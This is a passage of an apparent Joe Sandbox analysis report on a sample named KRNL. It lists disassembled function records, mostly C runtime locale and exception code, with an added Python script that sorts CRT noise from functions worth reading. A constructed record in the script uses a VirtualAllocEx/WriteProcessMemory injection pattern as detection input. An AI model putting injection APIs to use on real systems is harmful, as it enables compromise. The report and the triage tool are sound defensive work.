• Instruction Fuzzy Hash: 44018BB1C003499BCB00EF88DC0579EBBB4FB44720F004239E8096B340E339AA41CBD2
APIs
• RtlAllocateHeap.NTDLL(00000000,006FDF35,?,?,006FDF35,00000220,?,00000000,?), ref: 006FBF43
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 09119fd15b54bad78d59d7b767e4f2d2ce205d5f10919fa2cfd2db501a6af5d6
• Instruction ID: 5e399d5e231a650f0ec5a33978bf23f531aa2b9bd9dbe3e285bc4ff450a2ce8a
• Opcode Fuzzy Hash: 09119fd15b54bad78d59d7b767e4f2d2ce205d5f10919fa2cfd2db501a6af5d6
• Instruction Fuzzy Hash: FAE0653120756DA6DA212A69ED01BFA364AAF417B0F155161EF5D962D0DB20DC00C9A9
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 006E990F
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                          • Opcode ID: 6619770378216d3df83a9974e88a90e62222697532cf1a149cc2af2a5e6ba051
                                                                                                                                                                                                                                                          • Instruction ID: 1d78761b8fd9142918270acd56c53ae44c0001f1e4c8f63f328d5d34c192012e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6619770378216d3df83a9974e88a90e62222697532cf1a149cc2af2a5e6ba051
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80D05E397021644B87147B2DA8188AE6362AFC872035A846DE940D7386C728EC428680
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0070138F
                                                                                                                                                                                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 007013CD
                                                                                                                                                                                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 007013E0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00701428
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00701443
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                          • String ID: ,Kq
                                                                                                                                                                                                                                                          • API String ID: 415426439-4204376562
                                                                                                                                                                                                                                                          • Opcode ID: d8cea7d7afdb3925fa323ab02ecbb2c04eca52e343b7ffc1241e56b00816ce74
                                                                                                                                                                                                                                                          • Instruction ID: 8742ae4081815cfe086529e807c8d4fe040462c643a15d035f11897888423dd3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8cea7d7afdb3925fa323ab02ecbb2c04eca52e343b7ffc1241e56b00816ce74
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06514EB1A00209EBDB10DFA5DC45ABEB7F8BF45700F958669F901E71D0E7789A408B61
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                          • Opcode ID: 144d49f1a4418681aa83cd4e3c99419f7e23af40b258b9ac570496c8eedcf0eb
                                                                                                                                                                                                                                                          • Instruction ID: cf9c2b692fa4256e051d64561d26d851e4790d5f76afb2cd7ad430101c6fc11c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 144d49f1a4418681aa83cd4e3c99419f7e23af40b258b9ac570496c8eedcf0eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FED21871E08229CFDB65CE28CD447EAB7F5EB44305F1442EAD44DA7281EB78AE858F41
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,007013BD,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AA0
                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,007013BD,00000002,00000000,?,?,?,007013BD,?,00000000), ref: 00701AC9
                                                                                                                                                                                                                                                          • GetACP.KERNEL32(?,?,007013BD,?,00000000), ref: 00701ADE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                          • String ID: ACP$OCP
                                                                                                                                                                                                                                                          • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                          • Opcode ID: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
                                                                                                                                                                                                                                                          • Instruction ID: 3caf728f46d057cb60f71af56788e373c4dbfaf0e9ebf429d7a3d06cf04c9499
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5571135d027d6747782e181728e057ce2e3614bac7e1ea0d3e9794a7d1657ad
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 112186A2B02100EADB34CF58C900AD772EAEB54B54BD6C664E90AD7184F73ADD40C390
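The function records above (Concurrency::cancel_current_task from LIBCPMT, the GetUserDefaultLCID / IsValidCodePage / GetLocaleInfoW / GetACP cluster, and __floor_pentium4 with the 1#IND / 1#INF / 1#QNAN / 1#SNAN strings) are the MSVC C runtime's own locale setup and floating-point formatting code, statically linked into the sample. They tell an analyst nothing about the stealer logic, and a report of this size contains hundreds of them. The script below is an added example, not Joe Sandbox code: it parses records in the format this page uses (record boundary inferred as the "Instruction Fuzzy Hash" line, which closes every record here) and triages each one as CRT/STL noise or as worth reading. The allowlist of CRT support APIs and module names is a heuristic assumption of this example, and the fourth record in the sample input is constructed (invented addresses and placeholder hashes) to exercise the non-noise path; the first three are copied from this report.

```python
"""Triage Joe Sandbox per-function records: MSVC CRT/STL noise vs. functions worth reading.

Added example for this report, not Joe Sandbox code. Record layout is inferred from
the report text; the CRT allowlists below are an assumption (heuristic), not a sandbox feature.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# One resolved call line, e.g.
#   • GetACP.KERNEL32(?,?,007013BD,?,00000000), ref: 00701ADE
#   • Concurrency::cancel_current_task.LIBCPMT ref: 006E990F
#   • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>[\w:]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>.*?)\s*$"
)

# Heuristic allowlist (assumption): Win32 calls the MSVC CRT makes during its own
# startup, locale and code-page initialisation, plus CRT/STL module and symbol prefixes.
CRT_SUPPORT_APIS = {
    "GetLastError", "SetLastError", "GetUserDefaultLCID", "IsValidCodePage", "IsValidLocale",
    "GetLocaleInfoW", "GetACP", "GetOEMCP", "GetCPInfo", "LCMapStringW", "EnumSystemLocalesW",
    "GetStringTypeW", "MultiByteToWideChar", "WideCharToMultiByte",
}
CRT_MODULES = {"LIBCPMT", "LIBCMT", "MSVCRT", "MSVCP140", "VCRUNTIME140"}
CRT_NAME_PREFIXES = ("__", "Concurrency::", "std::")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str                       # call-site address inside the dump
    via_subcall: Optional[str]     # set when the call is attributed to a callee


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing into records; 'Instruction Fuzzy Hash' is the last field of each."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
            continue
        f = FIELD_LINE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    if cur.apis or cur.fields:     # listing cut off mid-record (as at a page boundary)
        records.append(cur)
    return records


def classify(rec: FunctionRecord) -> Tuple[str, List[str]]:
    """Return ('library' | 'interesting' | 'unknown', names outside the CRT allowlist)."""
    names = [(a.name, a.module) for a in rec.apis]
    if not names:
        # No resolved imports: fall back on the API ID token (e.g. "__floor_pentium4").
        names = [(tok, "") for tok in rec.fields.get("API ID", "").split("$") if tok]
    if not names:
        return "unknown", []
    hits = [n for n, mod in names
            if not (mod in CRT_MODULES or n.startswith(CRT_NAME_PREFIXES) or n in CRT_SUPPORT_APIS)]
    return ("interesting" if hits else "library"), hits


def triage(text: str) -> List[dict]:
    out = []
    for rec in parse_records(text):
        verdict, hits = classify(rec)
        out.append({"opcode_id": rec.opcode_id[:16], "verdict": verdict,
                    "hits": hits, "n_apis": len(rec.apis)})
    return out


# Constructed sample input: records 1-3 copied from this report, record 4 invented
# (made-up addresses, all-zero placeholder IDs) to show a record that is NOT CRT noise.
SAMPLE = """\
APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 006E990F
Similarity
• API ID: Concurrency::cancel_current_task
• String ID:
• Opcode ID: 6619770378216d3df83a9974e88a90e62222697532cf1a149cc2af2a5e6ba051
• Instruction Fuzzy Hash: 80D05E397021644B87147B2DA8188AE6362AFC872035A846DE940D7386C728EC428680
APIs
  • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
  • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
• GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0070138F
• IsValidCodePage.KERNEL32(00000000), ref: 007013CD
• IsValidLocale.KERNEL32(?,00000001), ref: 007013E0
• GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00701428
Similarity
• API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
• String ID: ,Kq
• Opcode ID: d8cea7d7afdb3925fa323ab02ecbb2c04eca52e343b7ffc1241e56b00816ce74
• Instruction Fuzzy Hash: 06514EB1A00209EBDB10DFA5DC45ABEB7F8BF45700F958669F901E71D0E7789A408B61
APIs
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• Opcode ID: 144d49f1a4418681aa83cd4e3c99419f7e23af40b258b9ac570496c8eedcf0eb
• Instruction Fuzzy Hash: FED21871E08229CFDB65CE28CD447EAB7F5EB44305F1442EAD44DA7281EB78AE858F41
APIs
• VirtualAllocEx.KERNEL32(?,00000000,00001000,00003000,00000040), ref: 00401234
• WriteProcessMemory.KERNEL32(?,?,?,00001000,00000000), ref: 00401250
Similarity
• API ID: AllocMemoryProcessVirtualWrite
• String ID:
• Opcode ID: 0000000000000000000000000000000000000000000000000000000000000000
• Instruction Fuzzy Hash: 0000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run over the full disassembly section of a report, this leaves the analyst with the handful of records that reference process, file, registry or network APIs; everything the allowlist swallows can be confirmed later by diffing its Opcode Fuzzy Hash against a clean MSVC-built binary of the same toolchain.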
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
• Instruction ID: 24fc032901f1b22d41496aaac67efc380e69dd7f29fb06294d7f9bb03791442a
• Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8022CB1E012199BDF14CFA8D880BEEB7B2FF49314F258269D619E7341D731AA41CB94
APIs
• FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 007020D9
• FindNextFileW.KERNEL32(00000000,?), ref: 007021CD
• FindClose.KERNEL32(00000000), ref: 0070220C
• FindClose.KERNEL32(00000000), ref: 0070223F
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:
• API String ID: 1164774033-0
• Opcode ID: 66c6c54dcd45d088b54bc4d7a1f11033e1a42bb17f1b240b4133cf501d63b5f7
• Instruction ID: 53b1c9723cd79afb3acb04f43122748ecbfddf754818e62590f5e0b48ed497e6
• Opcode Fuzzy Hash: 66c6c54dcd45d088b54bc4d7a1f11033e1a42bb17f1b240b4133cf501d63b5f7
• Instruction Fuzzy Hash: E971057290515CEEDF21AF24DC8DAFAB7F9AB05300F1442D9E14893292DB385E868F14
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 006EF8F5
• IsDebuggerPresent.KERNEL32 ref: 006EF9C1
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006EF9DA
• UnhandledExceptionFilter.KERNEL32(?), ref: 006EF9E4
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
• Instruction ID: 5632d1c138e7a82584e457cfc60b87353c65b2defacd1043c6c2c13a66e8f8c9
• Opcode Fuzzy Hash: b299b3d757efe673f12bd403e1ad15226acc2a1572084422503a80d4b76149c3
• Instruction Fuzzy Hash: C331F6B5D013199BDF61DFA5D9497CDBBB8AF08300F1081AAE44CAB290EB759A848F45
APIs
  • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
  • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007015D4
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0070161E
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 007016E4
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 2a57365d508e0a625dccfef43f6cc9f0f385dd136e30e49041e6a73b3810ddcb
• Instruction ID: 144c3b1e139f25d2f2823486c82294d876f545970ea23867542f84ea87d34527
• Opcode Fuzzy Hash: 2a57365d508e0a625dccfef43f6cc9f0f385dd136e30e49041e6a73b3810ddcb
• Instruction Fuzzy Hash: 07619E7161020BDBDB28DF28CD82BBA77E8EF15710F9482B9E905C65C5EB39D980DB50
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006F7F28
                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006F7F32
                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 006F7F3F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
APIs
• GetSystemTimePreciseAsFileTime.KERNEL32 ref: 006F00EC
• GetSystemTimeAsFileTime.KERNEL32(?,AB1687B8,006E8E30,?,0070BE77,000000FF,?,006EFDB4,?,00000000,00000000,?,006EFDD8,?,006E8E30,?), ref: 006F00F0
Memory Dump Source
• Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
• Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Time$FileSystem$Precise
• String ID:
• API String ID: 743729956-0
Strings
Similarity
• API ID:
• String ID: (=o$0
• API String ID: 0-2708008627
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00705BB9,?,?,00000008,?,?,0070BCAB,00000000), ref: 00705E8B
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006EF56B
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
APIs
  • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
  • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00701894
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                          • Opcode ID: 652491573d6cd6dc3476d88a0a4d6b634984e3df80e928b262b1bdcb7d8f96dd
                                                                                                                                                                                                                                                          • Instruction ID: 98b2f86cad7683df472d45ed7b4a7b1d1860b670a1adb4eeb2a8cbcb4969f229
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 652491573d6cd6dc3476d88a0a4d6b634984e3df80e928b262b1bdcb7d8f96dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E421B37261020AEBDB189A25CD41ABA77E8EF15721B50817EFD06C71C1EB38EE40D754
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: GetLastError.KERNEL32(?,?,006F5495,00718E38,0000000C), ref: 006FC16E
                                                                                                                                                                                                                                                            • Part of subcall function 006FC16A: SetLastError.KERNEL32(00000000), ref: 006FC210
                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00701580,00000001,00000000,?,-00000050,?,00701363,00000000,-00000002,00000000,?,00000055,?), ref: 0070154A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1675842312.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675824024.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675870875.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675889320.000000000071A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675908058.000000000071B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675928109.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675943593.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1675976105.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
